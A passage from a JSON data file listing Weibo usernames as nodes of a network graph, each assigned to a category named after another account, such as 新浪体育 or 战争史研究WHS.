"name": "约伯少木",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "江心洲的石头",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "罗昌平"
},
{
"name": "信仰铮",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "踏古悠悠",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "关东十二郎",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "龍叔論勢",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "小齐与玫瑰",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "阳光的小青年123",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "lionshuang",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "剑雨风竹wzp",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "leo快跑_",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "霄緰鳴",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "清宇建材",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "IHSAKAH",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "景页的彭",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "子非鱼非子vit",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "萨特5243280580",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "Unique斯通",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "信仰之魂之根",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "手自栽",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "霞客遗风",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "天心-月圆",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "小凯最爱羊羊",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "穿长靴的柴郡猫",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "看客二两七",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "王小签",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "重工组长于彦舒"
},
{
"name": "自古秃顶多薄命",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "陇南老代",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "HERO-熊",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "手机用户2011685586",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "披着虎皮的羊",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "竹林之闲七",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "坦帕湾魔鬼鱼",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "某气又方又圆",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "walmazon",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "RX-78-8",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "balcktomato",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "简木生--包丰瀛"
},
{
"name": "TroubleKid是MADAO",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "麻黑浮云"
},
{
"name": "爆炸神教唯我独尊",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "一个立派又迷人的营销号手机用户",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "春分大寒",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "上局沪段_沪"
},
{
"name": "曾经依然46",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "柳恒卓",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "适中求对",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "流星弦月",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "黑岛结菜厨",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "鬼男三世",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "重工组长于彦舒"
},
{
"name": "牧羽尽人",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "北斗之南V",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "自由知新",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "吉四六"
},
{
"name": "也曾相识0906",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "罗昌平"
},
{
"name": "小鱼妖贤",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "怀风的小号",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "路痴Lee",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "望霆止渴",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "Tiger公子"
},
{
"name": "海獭小元帅",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "梦里自在",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "人总要变僵尸",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "做题做到傻星人",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "不会结网的蜘蛛",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "艾特胖叔叔",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "重工组长于彦舒"
},
{
"name": "michelle0706",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "中二有治",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "重工组长于彦舒"
},
{
"name": "renaissance325",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "山行者不爬山",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "一只饼干熊",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "Double润-JR",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "海布利的机关枪",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "fhqskwwx",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "虚地天高海底行",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "杨术灵的公司是在香港注册的",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "吉四六"
},
{
"name": "快刀博士",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "阿腿-人活着就是为了式姐",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "李哈喽年抓虫子",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "重工组长于彦舒"
},
{
"name": "entaro",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "新型的农村人",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "远古的刀"
},
{
"name": "吴地老高",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "京城吃货日记"
},
{
"name": "只愿华丽一次",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "丁库北",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "猿十三"
},
{
"name": "2x2eyes着装变身",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "重工组长于彦舒"
},
{
"name": "小钱钱飞来招财进宝",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "Tiger公子"
},
{
"name": "乐_扬",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "三分音符V",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "喷嚏网铂程"
},
{
"name": "神之佩恩",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "重工组长于彦舒"
},
{
"name": "小超-唐新",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "雷焰萌虎",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "五十岚空芔"
},
{
"name": "蓝天白云5888",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "大虾本尊",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "CJ一个微博",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "阿里海牙科维奇",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "中出宪政柏拉图"
},
{
"name": "清古正华",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "八一魄力",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "worisi_na3",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "耳光赵荒唐"
},
{
"name": "用户5989473265",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "麻黑浮云"
},
{
"name": "沙漠王子82",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "BJ卫东围脖",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "大叔与流浪猫",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "重工组长于彦舒"
},
{
"name": "单刀126",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "赵伯安",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "all-time-low",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "凌舒韵",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "笨不傻",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "超昂闪存",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "重工组长于彦舒"
},
{
"name": "甲古的时代",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "孙润琦最近有点胖啊",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "会瘦的兔子",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "非典型精彩",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "上海曹凡",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "爱哟快乐"
},
{
"name": "小木木-H",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "曾经日在校园",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "呛呛枪",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "麻黑浮云"
},
{
"name": "ZY真人吉光片羽",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "M菊花的小GI",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "钟涓之",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "weibuloser",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "张晨初艺术空间"
},
{
"name": "潘恩豪啊潘恩豪",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "天枢道",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "穆sir---",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "剑吹白雪喵喵酱",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "淘气的小福儿",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "lfx160219"
},
{
"name": "惊梦时从来不报社",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "成都大河",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "琉璃厂人",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "江巴瓜poi",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "猫饭P"
},
{
"name": "偶尔有点帅1988",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "安庆爱慕摄影师阿文",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "破晓劲风",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "张晨初艺术空间"
},
{
"name": "EL-bazinga",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "OP牛牛real",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "田字格大人",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "Yoga_雪",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "王唔悦"
},
{
"name": "牛大腕和羊羔肉",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "一路上有你LXING",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "张晨初艺术空间"
},
{
"name": "小闫---闫宇航2_167",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "重工组长于彦舒"
},
{
"name": "书客的马甲",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "麻黑浮云"
},
{
"name": "廿五廿六",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "嗷嘚儿刘",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "月想夜雫",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "猫饭P"
},
{
"name": "人生装修中的王白薯",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "老哥哥农农",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "山城球长",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "罗昌平"
},
{
"name": "愚忠不中",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "豆名扬"
},
{
"name": "搞一手",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "用户3639916871",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "杨培军ypj",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "天津王麟"
},
{
"name": "命名馆的故事",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "动物凶猛吗",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "拖大林的斯拉机",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "Wcqsoil奇",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "喷嚏网铂程"
},
{
"name": "-隔壁尛王",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "中出宪政柏拉图"
},
{
"name": "jinguokai",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "樱花突击队",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "笑嘻嘻不是孬东西",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "明月照清疯",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "philosophic_philo",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "-_---17---_-",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "于小文很跋扈",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "更木千秋",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "看你妹夫斯基",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "重工组长于彦舒"
},
{
"name": "各路英雄我是炮灰",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "Panda加速度",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "变态的小幸福",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "京城吃货日记"
},
{
"name": "云信321312747",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "见习魔王",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "山魈屠魔",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "罗昌平"
},
{
"name": "smthpickboy",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "读心术宋_Ssir226",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "糖丶King",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "深圳-0755",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "张晨初艺术空间"
},
{
"name": "吹風左",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "霖希默语",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "34X5A7",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "蝶升思26812",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "Tony悟空孙",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "山里的孩子去砍柴",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "麻黑浮云"
},
{
"name": "XTG29",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "血红暴鲤魚",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "傲血困意",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "简木生--包丰瀛"
},
{
"name": "只道是寻常草履虫",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "李家老三是藕霸",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "苍天的渔民饥饿的猫",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "重工组长于彦舒"
},
{
"name": "宁紫晗f",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "陇上优品-陶磊"
},
{
"name": "Biu--------------",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "ROCK在民大",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "wwwwwww_W",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "张晨初艺术空间"
},
{
"name": "黑羽太太薄爷爷",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "sazen"
},
{
"name": "焖猪脚",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "九又十三分之一",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "耳光赵荒唐"
},
{
"name": "dengliang100",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "慢慢买4j",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "ORANGE_TULIP_2015__盾构工程",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "女汉子只是多了一那份坚强錟",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "张晨初艺术空间"
},
{
"name": "赵翼菲",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "罗昌平"
},
{
"name": "balestra",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "西瓜大将",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "毛巾在飞翔",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "青鸟tw",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "卖蟑螂的小男孩XD",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "盖世英雄_i",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "相忘于2222"
},
{
"name": "找北的时光",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "天水2院张医生"
},
{
"name": "片桂hoho嘎",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "雨小农和獭祭鱼",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "子-都",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "哥是厦大的",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "罗昌平"
},
{
"name": "买不起早点的门房郑大爷",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "MrFopenheart",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "梦佳红人",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "JustForFunDude",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "徐冲dy",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "王霸丑",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "重工组长于彦舒"
},
{
"name": "已过期的凤梨罐头",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "果果的妈妈",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "lfx160219"
},
{
"name": "被阳光点燃的小雏菊",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "SOLOWINGROCKY",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "不吃萝卜的野生鱼",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "罗昌平"
},
{
"name": "Urnotprepared",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "北大十五",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "大漠孤烟平凉",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "罗昌平"
},
{
"name": "messenger16",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "-逐梦令-",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "罗昌平"
},
{
"name": "寒木9740",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "冯某钊",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "大眼李",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "吉四六"
},
{
"name": "阿特兰蒂斯的飞鸟",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "无心耳语08"
},
{
"name": "顺手牵杨扬",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "Hu_子叔叔",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "67年生人的记忆碎片",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "苗条的小实"
},
{
"name": "千手捉鸡_",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "降夭除魔齐天大圣"
},
{
"name": "pmzqld",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "喷嚏网铂程"
},
{
"name": "我可以咬一口耶",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "浪里秤砣",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "SofayW",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "Very流浪的小拖鞋",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "LSX_N欣",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "降夭除魔齐天大圣"
},
{
"name": "偏不见就叫偏不见",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "castle84",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "IceE_U",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "燃满愿",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "风花雪月去",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "开拓者3569",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "一小撮别有用心的小猪在跳舞",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "简木生--包丰瀛"
},
{
"name": "波灵谷",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "饱饱的酸菜君",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "Tiger公子"
},
{
"name": "关洪导演",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "相忘于2222"
},
{
"name": "人一定要靠自己",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "老师教案的宝宝",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "中出宪政柏拉图"
},
{
"name": "毛i台钧",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "张晨初艺术空间"
},
{
"name": "时间苍窮",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "刘海哲",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "君王板甲胡屠户",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "富怡-宝盈-盈瑞恒",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "嗨哥苏大少"
},
{
"name": "周氏豆沙",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "远古的刀"
},
{
"name": "赵毫毛",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "刺猬-的生活",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "Digital蚊子",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "简木生--包丰瀛"
},
{
"name": "烈日下的森岛",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "鋈圆",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "纪岚挺",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "新浪体育"
},
{
"name": "ParPar2011",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "谁执流素舞青月",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "七绪平门",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "重工组长于彦舒"
},
{
"name": "苏乄小溪",
"symbolSize": 5,
"draggable": "False",
"value": 0,
"category": "战争史研究WHS"
},
{
"name": "flowtime",
"symbolSize": 5,
"draggable": "False",
"value": 0,
